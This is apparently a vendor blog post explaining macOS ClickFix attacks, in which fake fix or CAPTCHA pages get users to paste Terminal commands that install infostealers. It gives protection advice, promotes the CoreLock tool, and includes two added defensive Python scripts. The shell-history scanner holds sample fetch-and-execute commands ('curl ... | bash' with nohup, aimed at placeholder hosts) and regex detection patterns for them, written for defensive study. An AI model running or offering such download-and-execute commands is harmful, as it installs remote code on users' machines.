What Is a ClickFix Attack? The Mac Threat You Haven't Heard Of
You are browsing the web. A popup appears telling you something is wrong with your browser. There is a "Fix" button. You click it. It copies a command to your clipboard and tells you to paste it into Terminal. You follow the instructions because the page looks legitimate and you just want the problem to go away.
You have just installed malware on your Mac. And your Mac's built-in security did nothing to stop it, because you told it to let the malware in.
This is called ClickFix, and it is one of the fastest-growing threats targeting Mac users in 2026. I have been tracking it closely because it represents a fundamental shift in how attackers go after macOS. They stopped trying to break through Apple's defenses. They trick you into opening the door yourself.
What is ClickFix?
ClickFix is a social engineering technique where attackers create fake error messages, CAPTCHA pages, or system warnings that instruct you to copy and paste a malicious command into your Mac's Terminal app. The name comes from the premise: click this button, and it will "fix" your problem.
The technique was first observed in early 2024 targeting Windows users. By mid-2025, researchers at Microsoft and Proofpoint documented ClickFix campaigns adapted for macOS. Since late 2025, it has exploded. Microsoft reported a significant surge in macOS-targeted infostealer campaigns using ClickFix-style prompts, and new variants like "CrashFix" and "Matryoshka ClickFix" have emerged with even more convincing social engineering.
This is not theoretical. It is active, evolving, and targeting Mac users right now.
How a ClickFix attack works, step by step
Here is exactly what happens during a typical ClickFix attack on macOS.
Step 1: You land on a malicious page
You encounter a fake page through a Google ad, a compromised website, or a phishing email. Common disguises include fake Cloudflare "Verify You Are Human" CAPTCHA pages, browser error messages claiming Chrome or Safari needs an update, and system alerts warning about a missing driver.
Step 2: You click the button
The page has a prominent button labeled "Verify," "Fix," or "Continue." When you click it, a malicious command is silently copied to your clipboard. You never see what was copied.
Step 3: You follow the instructions
The page shows step-by-step instructions tailored for macOS: press Command + Space to open Spotlight, type "Terminal," press Command + V to paste, and hit Enter. Some variants show animated GIFs walking you through the process.
Step 4: The command executes
The pasted command uses curl in silent mode to download a script from an attacker-controlled server, pipes it to bash for immediate execution, and uses nohup to keep running even if you close Terminal. In seconds, malware is installed and running.
Step 5: Your data is stolen
The malware immediately begins harvesting your data. Within minutes, passwords, cookies, crypto wallets, and personal files are being uploaded to the attacker's servers.
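The command shape described in Step 4 (a silent curl download piped to a shell and detached with nohup) is also what a defender can look for afterwards in shell history. The following is an added example, not code from the original article or from CoreLock; it assumes zsh history in plain or EXTENDED_HISTORY format, and the sample entries and `example.invalid` URLs are constructed.

```python
import re
import sys
from pathlib import Path

ZSH_PREFIX = re.compile(r"^: \d+:\d+;")  # zsh EXTENDED_HISTORY ": <epoch>:<secs>;" prefix
# A fetch tool whose output is piped straight into a shell interpreter.
FETCH_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
# curl running with -s (alone or bundled, e.g. -fsSL) or --silent.
SILENT = re.compile(r"\bcurl\b[^|]*\s(?:-[A-Za-z]*s[A-Za-z]*\b|--silent\b)")
# nohup, or a single trailing "&" that backgrounds the job.
DETACHED = re.compile(r"\bnohup\b|(?<!&)&\s*$")

# Constructed history entries (not captured from any real campaign).
SAMPLE_HISTORY = [
    ": 1767000001:0;ls ~/Library/LaunchAgents/",
    ": 1767000002:0;curl -O https://example.invalid/archive.zip",
    ': 1767000003:0;nohup bash -c "curl -s https://example.invalid/fix | bash" &',
    "brew update && brew upgrade",
    ": 1767000005:0;curl -fL https://example.invalid/install.sh | sh",
]


def scan_history(lines):
    """Return (line_number, command, traits) for each download-and-execute entry."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        command = ZSH_PREFIX.sub("", raw.strip())
        if not FETCH_TO_SHELL.search(command):
            continue  # plain downloads and unrelated commands are not flagged
        traits = ["fetch-piped-to-shell"]
        if SILENT.search(command):
            traits.append("silent")
        if DETACHED.search(command):
            traits.append("detached")
        findings.append((number, command, traits))
    return findings


if __name__ == "__main__":
    lines = SAMPLE_HISTORY
    if len(sys.argv) > 1:  # pass a history file, e.g. ~/.zsh_history
        lines = Path(sys.argv[1]).read_text(errors="replace").splitlines()
    for number, command, traits in scan_history(lines):
        print(f"line {number}: {', '.join(traits)}\n    {command}")
```

An entry carrying all three traits matches the pattern from Step 4; a bare fetch-piped-to-shell hit is also how some legitimate installers work, so read the URL before drawing conclusions.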
Why ClickFix is devastatingly effective on Mac
This is the part that concerns me most. ClickFix does not exploit a software vulnerability. It exploits trust. And that means your Mac's built-in protections are almost entirely useless against it.
Gatekeeper cannot help. Gatekeeper checks applications when you download and open them. ClickFix does not ask you to download an app. It asks you to paste a command into Terminal, an app that Apple already trusts. Gatekeeper never intervenes.
XProtect may not catch it. XProtect scans for known malware signatures. But the initial command is just a curl download. The payload can change constantly, and new variants may not have signatures yet.
Notarization is irrelevant. Apple's notarization system checks that apps are signed before they run. Terminal commands bypass this entirely. You are running a shell command, and macOS lets you because it assumes you know what you are doing.
The user is the attack vector. Every technical control on your Mac is designed to protect you from malicious software. ClickFix turns you into the one who installs it.
This is why security is not just about scanning for known threats. It is about understanding what is happening on your machine and flagging when something looks wrong, even if the user authorized it.
What gets installed
The malware delivered through ClickFix attacks is almost always an infostealer. Here are the families we are seeing most often in 2026.
Atomic macOS Stealer (AMOS)
AMOS is the most common payload in Mac-targeted ClickFix campaigns. Once running, it extracts Keychain passwords, browser cookies and saved credentials from Chrome, Firefox, and Safari, cryptocurrency wallet data from Electrum, Exodus, and Coinomi, files from your Desktop and Documents folders, and your macOS user password through a fake system dialog. AMOS is sold as malware-as-a-service, meaning anyone can buy and run campaigns. That is why it is so widespread. If you want to understand the signs your Mac might be compromised, this is exactly the kind of threat to watch for.
MacSync
MacSync is a newer infostealer that initially relied on ClickFix-style Terminal tricks but has evolved into code-signed Swift applications distributed through typosquatted domains. It targets data similar to what AMOS targets but uses different exfiltration methods.
DigitStealer and others
Microsoft documented additional stealer families, including DigitStealer, being distributed alongside AMOS and MacSync through ClickFix campaigns. The stealer ecosystem on macOS is growing fast.
All of these stealers typically install persistence mechanisms using LaunchAgents, meaning they survive reboots and continue running in the background. Understanding what hidden processes look like on your Mac is critical for spotting this kind of persistence.
The latest evolution: CrashFix
In February 2026, Microsoft published research on a particularly nasty ClickFix variant called CrashFix. Here is how it works.
An attacker distributes a malicious browser extension masquerading as a legitimate ad blocker. The extension works normally for a while. Then it intentionally crashes the browser and displays a fake "CrashFix" warning. Because the browser actually did crash, the victim believes the error is real.
The fake warning walks the user through the standard ClickFix flow: copy a command and paste it into Terminal to "restore" the browser. A real crash combined with a fake fix makes this variant significantly more convincing.
How to protect yourself
The good news is that once you know what ClickFix looks like, it loses almost all of its power. Here is what to do.
Never paste commands from websites into Terminal
This is the single most important rule. No legitimate website will ever ask you to open Terminal and paste a command to fix your browser, verify your identity, complete a CAPTCHA, or update your system. If a website asks you to do this, it is an attack. Close the tab.
Treat "fix" buttons with extreme suspicion
If a popup claims something is wrong with your Mac and offers a quick fix, assume it is malicious. Real system errors do not appear in your browser. Real CAPTCHAs never require Terminal. Real updates come through System Settings or the App Store.
Only run Terminal commands from trusted sources
If you use Terminal, only run commands from official documentation or developers you trust. Read the command before running it. If you cannot explain what every part does, do not run it.
Audit your browser extensions
Given the CrashFix variant, regularly review your browser extensions. Remove any you do not actively use. Only install extensions from official stores, and check reviews and developer reputation. For a full walkthrough, check out our comprehensive Mac security guide.
Monitor for anomalous processes and connections
If you suspect you encountered a ClickFix attempt, check what is running on your Mac. CoreLock is built for exactly this. It monitors running processes and network connections, flagging the kind of shell-spawned processes and outbound connections that ClickFix payloads create. You do not need to know what curl piped to bash looks like in a process list. CoreLock knows, and it will tell you.
If you think you fell for it
If you pasted a command from a website into Terminal and now you are worried, here is what to do immediately.
Disconnect from the internet. Turn off Wi-Fi and unplug Ethernet. This stops any ongoing data exfiltration.
Check for unknown processes. Open Activity Monitor (Applications > Utilities > Activity Monitor) and look for processes you do not recognize, especially anything consuming network resources.
Check your LaunchAgents folders. These are the most common persistence locations for Mac malware. Open Terminal (yes, Terminal is still safe to use when you know what you are typing) and run:
ls ~/Library/LaunchAgents/
ls /Library/LaunchAgents/
ls /Library/LaunchDaemons/
Look for anything you do not recognize. Legitimate entries are usually from Apple or known software vendors.
Change your passwords from a different device. Do not change passwords on the potentially compromised Mac. Use your phone or another computer. Prioritize your email, bank accounts, and any cryptocurrency accounts.
Run a full scan. Use CoreLock to scan every running process, check for persistence mechanisms, and identify any anomalous network connections. It will give you a clear picture of whether something malicious is running and what it is doing. You can download CoreLock for free and scan in under a minute.
For a detailed walkthrough on cleaning up after an infection, read our guide on how to remove malware from your Mac.
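Listing the LaunchAgents folders shows file names only; what matters is the program each entry actually launches. The following added example (not from the original article or from CoreLock) parses every plist in the three folders above and prints its label and command line. The interpreter list and path prefixes are assumed heuristics for deciding what to read first, not a malware verdict, and it needs a `python3` install on the Mac.

```python
import plistlib
from pathlib import Path

# The three folders the article tells you to list.
PERSISTENCE_DIRS = [Path.home() / "Library/LaunchAgents",
                    Path("/Library/LaunchAgents"),
                    Path("/Library/LaunchDaemons")]
# Assumed heuristics, not a malware verdict: tune both for your own machine.
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "curl"}
ODD_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def review_job(job):
    """Return (argv, reasons) for one parsed launchd job dictionary."""
    argv = job.get("ProgramArguments") or [job.get("Program", "")]
    argv = [str(arg) for arg in argv if arg]
    reasons = []
    if not argv:
        reasons.append("no Program or ProgramArguments")
    elif Path(argv[0]).name in INTERPRETERS:
        reasons.append("launches via " + Path(argv[0]).name)
    if any(arg.startswith(ODD_PREFIXES) or "/." in arg for arg in argv):
        reasons.append("temporary or hidden path")
    return argv, reasons


def audit(directories=PERSISTENCE_DIRS):
    """Parse every .plist (XML or binary) and report what each job really runs."""
    rows = []
    for directory in directories:
        for path in sorted(Path(directory).glob("*.plist")):
            try:
                with path.open("rb") as handle:
                    job = plistlib.load(handle)
                argv, reasons = review_job(job)
                label = str(job.get("Label", "?"))
            except Exception:  # unreadable, malformed, or not a dictionary
                label, argv, reasons = "?", [], ["unreadable or malformed plist"]
            rows.append({"file": path.name, "label": label,
                         "argv": argv, "reasons": reasons})
    return rows


if __name__ == "__main__":
    for row in audit():
        flag = "REVIEW" if row["reasons"] else "ok"
        print(f'{flag:6} {row["file"]}: {" ".join(row["argv"])} {row["reasons"]}')
```

Entries marked REVIEW are the ones to compare against software you knowingly installed; an "ok" entry with a label or path you do not recognize still deserves a look.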
The bigger picture
ClickFix represents a broader shift in the macOS threat landscape. Attackers have learned that breaking through Apple's technical defenses is hard. Tricking users into bypassing those defenses themselves is easy. We are going to see more of this, not less.
The Mac community spent years believing that Macs do not get malware. That was never entirely true, but it was true enough that most Mac users never developed the healthy paranoia that Windows users have. ClickFix exploits that complacency directly.
I built CoreLock because Mac security needs to go beyond signature-based scanning. It needs to understand behavior. When a shell command spawns a process that immediately starts making encrypted connections to an unfamiliar server, that should raise a flag, regardless of whether it matches a known signature. That behavioral awareness is what separates catching a ClickFix payload from missing it entirely.
Stay skeptical. If a website tells you to paste something into Terminal, close it. Your browser does not need fixing. Your Mac does not need a command-line CAPTCHA. No legitimate service will ever ask you to open Terminal to verify that you are human.
Want to know what is actually running on your Mac right now? Download CoreLock for free and scan your system in under a minute. No Terminal commands required.